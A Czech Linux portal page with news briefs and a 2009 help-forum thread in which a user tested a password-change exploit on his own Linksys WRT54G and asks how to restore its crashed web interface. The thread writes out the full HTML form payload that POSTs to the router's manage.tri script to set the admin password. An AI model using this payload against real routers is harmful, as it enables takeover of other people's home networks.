Inzerujte na AbcPráce.cz od 950 Kč

napište » Zprávičky

FatGid aneb CVE-2026-45250, lokální eskalace práv ve FreeBSD

dnes 21:33 | Bezpečnostní upozornění

Ve FreeBSD byla nalezena a opravena zranitelnost FatGid aneb CVE-2026-45250. Jedná se o lokální eskalaci práv. Neprivilegovaný uživatel se může stát rootem.

Ladislav Hagara | Komentářů: 0

Flipper One

dnes 14:33 | IT novinky

Společnost Flipper Devices oznámila Flipper One. Zcela nový Flipper postavený od nuly. Jedná se o open-source linuxovou platformu založenou na čipu Rockchip RK3576. Hledají se dobrovolníci pro pomoc s dokončením vývoje (ovladače, testování, tvorba modulů).

Ladislav Hagara | Komentářů: 2

vkd3d 2.0

dnes 14:00 | Nová verze

Vývojáři Wine oznámili vydání verze 2.0 knihovny vkd3d pro překlad volání Direct3D na Vulkan. Přehled novinek na GitLabu.

Ladislav Hagara | Komentářů: 0

Red Hat Enterprise Linux (RHEL) 10.2 a 9.8

dnes 11:33 | Nová verze

Společnost Red Hat oznámila vydání Red Hat Enterprise Linuxu (RHEL) 10.2 a 9.8. Vedle nových vlastností a oprav chyb přináší také aktualizaci ovladačů a předběžné ukázky budoucích technologií. Vypíchnout lze CLI AI asistenta goose. Podrobnosti v poznámkách k vydání (10.2 a 9.8).

Ladislav Hagara | Komentářů: 0

Apache NetBeans 30

dnes 05:11 | Nová verze

Organizace Apache Software Foundation (ASF) vydala verzi 30 integrovaného vývojového prostředí a vývojové platformy napsané v Javě NetBeans (Wikipedie). Přehled novinek na GitHubu. Instalovat lze také ze Snapcraftu a Flathubu.

Ladislav Hagara | Komentářů: 0

WordPress 7.0 Armstrong

dnes 05:00 | Nová verze

Byla vydána nová verze 7.0 svobodného open source redakčního systému WordPress. Kódové jméno Armstrong bylo vybráno na počest amerického jazzového trumpetisty a zpěváka Louise Armstronga (What A Wonderful World).

Ladislav Hagara | Komentářů: 0

Kritická zranitelnost v Drupalu (SA-CORE-2026-004, CVE-2026-9082)

dnes 04:55 | Bezpečnostní upozornění

V Drupalu byla nalezena a opravena kritická zranitelnost SA-CORE-2026-004 (CVE-2026-9082). Útočník může provádět libovolné SQL dotazy na webech používajících databázi PostgreSQL.

Ladislav Hagara | Komentářů: 0

HP sponzorem služby Linux Vendor Firmware Service (LVFS)

včera 14:11 | Komunita

Richard Hughes oznámil, že službu Linux Vendor Firmware Service (LVFS) umožňující aktualizovat firmware zařízení na počítačích s Linuxem, nově sponzoruje také společnost HP.

Ladislav Hagara | Komentářů: 3

Demoscéna: Wake Up! 16b

včera 13:33 | IT novinky

O víkendu proběhla demopárty Outline 2026. Publikována byla prezentovaná dema. Upozornit lze na 16 bajtové, opravdu šestnáct bajtové, zvukově obrazové demo Wake Up! 16b (YouTube).

Ladislav Hagara | Komentářů: 2

Ardour 9.5

včera 04:22 | Nová verze

Byla vydána nová verze 9.5 multiplatformní digitální pracovní stanice pro práci s audiem (DAW) Ardour. Přehled novinek, vylepšení a oprav v poznámkách k vydání a na YouTube.

Ladislav Hagara | Komentářů: 0

Centrum | Napsat | Starší

navrhněte » Anketa

Komentářů: 30, poslední 3.4. 20:20

Rozcestník

AbcLinuxu

HDmag.cz

AbcLinuxu:/ Poradna / Hardwarová poradna / Router Linksys WRT54G - hacked - nejde http na routeru

Štítky: HTML, Internet, konfigurace, password, router, TELNET, web

Dotaz: Router Linksys WRT54G - hacked - nejde http na routeru

9.5.2009 09:44 Otto Šabart | skóre: 13 | blog: KatiePC blog
Router Linksys WRT54G - hacked - nejde http na routeru

Přečteno: 1226×

Odpovědět | Admin

Ahojte, mam menší problém.

Vlastnim router Linksys wrt54g (version 7). Neveril jsem tomu, že existuje na tento router exploit pomocí kterého si bez problému zmenite cele master password. Musel jsem to vyzkouset. Exploit posle data pres POST na script roterovsky script manage.tri.

Ukazka vypada nejak takto:





<\form method="post" action="http://192.168.2.1/manage.tri">

<\input type="hidden" name="remote_mgt_https" value="0">

<\input type="hidden" name="http_enable" value="1">

<\input type="hidden" name="https_enable" value="0">

<\input type="hidden" name="PasswdModify" value="1">

<\input type="hidden" name="http_passwd" value="hacked">

<\input type="hidden" name="http_passwdConfirm" value="hacked">

<\input type="hidden" name="_http_enable" value="1">

<\input type="hidden" name="web_wl_filter" value="1">

<\input type="hidden" name="remote_management" value="0">

<\input type="hidden" name="upnp_enable" value="1">

<\input type="hidden" name="layout" value="en">

<\input type="submit">

<\/form>

Tento html kod zmeni master pasword na "hacked". Neveril jsem tomu, a hle, ono se to povedlo. Do administrace me to pustilo pod novým heslem. Neveril jsem tomu. Musel jsem vse vyzkouset jeste jednou. Jenze po druhem pokusu na routeru spadla cela sluzba pro HTTP a uz neslo jit vubec do webove administrace. Ani po vypnuti a zapnuti routeru http nenaskoci. Bojim se router vyresetovat uplne, protoze si myslim, ze se akorat vyresetuje konfigurace a http stejne nenaskoci. Router by pak byl uz uplne nepouzitelny. Krome http na routeru funguje zatim vsechno a sit je normalne funkcni - jen proste nejde zmenit jakoukoliv konfiguraci.

Situaci jsem chtel resit pres telnet. Jenze u verze 7 telnet nefunguje.

Nevite nekdo jakym zpusobem http nahodit nebo jestli MasterReset zafunguje a nahodi sluzbu?

Za vsechny napady dekuju.

*´¨)¸.·´¨)¸.·***·>>> www.seberm.com

Řešení dotazu:

Komentář #5 (Otto Šabart, 1 hlasů)

Nástroje: Začni sledovat (1) ?

Odpovědi

9.5.2009 14:18 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: Router Linksys WRT54G - hacked - nejde http na routeru

Eh, otevřít to a připojit se přes JTAG asi nemůžeš, že? Jinak já bych to vyresetoval a když to nepomůže, tak bych si sehnal nádobíčko pro připojení k sériáku... Google: Linksys WRT54G jtag, nezoufej, vypadá to, že si s ním užili i jiní ;-)

9.5.2009 14:35 Otto Šabart | skóre: 13 | blog: KatiePC blog
Rozbalit Rozbalit vše Re: Router Linksys WRT54G - hacked - nejde http na routeru

No, bude to jeste asi dost zajimavy. Pockam na chvili az bude opravdu nutne router vyresetovat a uvidime jestli sluzba naskoci. Resit to pres ten JTAG je celkem neomalene reseni, ale kdyz mi nic jineho nezbyde, tak to zkusim. Treba se neco priucim.

*´¨)¸.·´¨)¸.·***·>>> www.seberm.com

10.5.2009 19:39 R
Rozbalit Rozbalit vše Re: Router Linksys WRT54G - hacked - nejde http na routeru

Ahoj, myslím že nejlepší by bylo udělat master reset a nahrát poslední "Firmware Version: v7.00.4"

Vlastním také WRT54G a http normálně do internetu otevřené nemám, ale jednou jsem ho potřeboval konfigurovat vzdáleně a tak jsem to na pár dní otevřel. Když jsem se pak chtěl připojit, tak to na http nedalo ani přihlašovací okno. Restart nepomohl, tak jsem udělal master reset, ten pomohl. Pokusil jsem se nahrát poslední firmware 7.00.4 to ale z neznámého důvodu nedopadlo a WRT byl v háji. Až nakonec po různých kombinacích zapnutí vypnutí a resetů se router rozjel a po připojení na http se objevilo okénko kde jediné co se dalo dělat byl upgrade firmware. Tak jsem ho tam znovu nahrál, tentokrát to dopadlo OK a router chodí.

10.5.2009 21:52 Otto Šabart | skóre: 13 | blog: KatiePC blog
Rozbalit Rozbalit vše Re: Router Linksys WRT54G - hacked - nejde http na routeru

Ja ("nastesti" - ono jak kdy :-) ), primo do internetu pripojen nejsem. Jsem kryty jeste jednim routerem, takze o bezpecnost obavy tolik nemam. Asi pujdu na ten master reset, uvidime jestli naskoci. Pak sem dam vedet jak to dopadlo. Uz nevim jiste jestli jsem mel zupgradovano na 7.004, ale urcite to kdyztak napravim (jestli bude jeste moznost to napravit :-) ).

*´¨)¸.·´¨)¸.·***·>>> www.seberm.com

Řešení 1× (Otto Šabart (tazatel))

11.5.2009 18:03 Otto Šabart | skóre: 13 | blog: KatiePC blog
Rozbalit Rozbalit vše Re: Router Linksys WRT54G - hacked - nejde http na routeru

Takze jsem router vyresetoval, a to nekolikrat. Asi az treti restart pomohl a http naskocilo. Vse jsem znovu nakonfiguraoval a uz vse funguje tak jak ma. Dekuji za odpovedi.

*´¨)¸.·´¨)¸.·***·>>> www.seberm.com

Založit nové vlákno • Nahoru

Tiskni Sdílej: